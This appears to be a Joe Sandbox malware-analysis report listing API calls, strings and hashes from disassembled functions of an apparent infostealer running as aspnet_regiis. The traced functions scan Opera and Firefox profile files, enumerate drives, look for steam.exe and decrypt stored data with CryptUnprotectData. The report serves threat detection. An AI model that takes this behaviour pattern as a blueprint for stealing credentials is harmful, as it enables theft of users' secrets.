                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                            • String ID: %s\%s
                                                                                                                            • API String ID: 1150833511-4073750446
                                                                                                                            • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                            • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                            • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                            • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                            Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                            • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                            • API String ID: 2567437900-1710495004
                                                                                                                            • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                            • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                            • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                            • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                            Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                            • _memset.LIBCMT ref: 004151E5
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                              • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                              • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                              • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                              • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                              • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                              • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                              • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                              • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                            • API String ID: 441469471-147700698
                                                                                                                            • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                            • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                            • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                            • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                            Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                            • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040D956
                                                                                                                            • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                            • String ID: prefs.js
                                                                                                                            • API String ID: 893096357-3783873740
                                                                                                                            • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                            • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                            • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                            • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                            Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                            • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3801961486-0
                                                                                                                            • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                            • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                            • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                            • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                            Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                            • String ID: steam.exe
                                                                                                                            • API String ID: 1799959500-2826358650
                                                                                                                            • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                            • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                            • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                            • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                            Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                            • String ID: /
                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                            • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                            • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                            • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                            • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                            Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1799959500-0
                                                                                                                            • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                            • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                            • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                            • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                            Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                            • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                            • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
